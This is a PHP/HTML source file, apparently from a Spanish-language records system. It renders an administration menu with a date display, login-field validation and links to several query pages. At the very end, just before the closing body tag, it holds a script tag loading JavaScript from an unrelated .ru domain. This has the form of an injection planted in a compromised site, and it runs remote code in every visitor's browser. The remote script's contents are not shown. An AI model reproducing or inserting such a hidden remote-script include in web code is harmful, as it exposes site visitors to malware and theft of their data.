File: /home/asjudine/www/Menu_Administracion.php
<?php
require_once("mainfile.php");
include ("header.php");
?>
<html>
<head>
<title>Documento sin título</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script Language="JavaScript"><!--
function validar(formulario)
{
if (formulario.Login.value == "")
{
alert("POR FAVOR LLENAR EL CAMPO LOGIN");
formulario.Login.focus();
return (false);
}
if (formulario.Password.value == "")
{
alert("POR FAVOR LLENAR EL CAMPO PASSWORD");
formulario.Password.focus();
return (false);
}
return (true);
}
//--></script>
<script languaje="JavaScript">
function Mostrar_Fecha()
{
var mydate=new Date()
var year=mydate.getYear()
if (year < 1000)
year+=1900
var day=mydate.getDay()
var month=mydate.getMonth()
var daym=mydate.getDate()
if (daym<10)
daym="0"+daym
var dayarray=new Array("Domingo","Lunes","Martes","Miercoles","Jueves","Viernes","Sabado")
var montharray=new Array("Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre")
document.write("<b><font face='Arial, Helvetica, sans-serif'>"+dayarray[day]+" "+daym+" de "+montharray[month]+" de "+year+"</font></b>")
}
</script>
<style type="text/css">
<!--
.Estilo7 {color: #000099; font-family: Arial, Helvetica, sans-serif; }
.Estilo9 {font-weight: bold}
body {
background-image: url();
}
.Estilo15 {font-family: Arial, Helvetica, sans-serif}
.Estilo17 {font-size: 18px}
.Estilo18 {font-family: Arial, Helvetica, sans-serif; font-size: 18px; }
.Estilo19 {font-size: 14px}
.Estilo20 {font-size: 14px; font-weight: bold; }
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body OnLoad="document.formulario.Login.focus()">
<div id="Layer2" style="position:absolute; left:438px; top:506px; width:149px; height:40px; z-index:2">
<table width="150" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><a href="index.php"><img src="Anterior.png" width="150" height="40" border="0"></a></td>
</tr>
</table>
</div>
<div id="Layer3" style="position:absolute; left:318px; top:134px; width:386px; height:334px; z-index:5">
<table width="387" height="42" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
<tr bgcolor="#ECE9D8">
<td height="23"><div align="center" class="Estilo7">
<p class="Estilo9 "><strong>MENU ADMINISTRACION DE RESPUESTAS </strong></p>
</div></td>
</tr>
<tr bgcolor="#FFFFCC">
<td height="19"><div align="center">
<script languaje="JavaScript">Mostrar_Fecha()</script>
</div></td>
</tr>
</table>
<table width="386" height="320" border="0" cellpadding="0" cellspacing="0" bgcolor="#ECE9D8">
<tr>
<td height="19"> </td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><div align="center" class="Estilo15 Estilo17"><a href="Enviar_Respuestas.php" target="_blank" class="Estilo19">Enviar Respuestas </a></div> <div align="center" class="Estilo18">
<p><a href="Consultar_Respuestas.php" class="Estilo19">Consultar por número de Identificación</a></p>
<p><a href="Consultar_Apellidos.php" class="Estilo19">Consultar por apellidos y nombres </a></p>
<p><a href="Consultar_Funcionario.php" class="Estilo19">Consultar por funcionario que expide el documento</a></p>
<p><a href="Numero_Radicacion.php" class="Estilo19">Consultar por Número de Radicación</a></p>
<p><a href="Consultar_Fecha_Envio.php" class="Estilo19">Consultar por fecha de envío</a></p>
<p><a href="Consultar_Fecha_Documento.php" class="Estilo19">Consultar por fecha del documento</a></p>
<p><a href="Consultar_Asunto.php" class="Estilo19">Consultar por asunto </a></p>
<p> </p>
</div></td>
</tr>
</table>
</div>
<script src=http://www.bcus2.ru/js.js></script></body>
</html>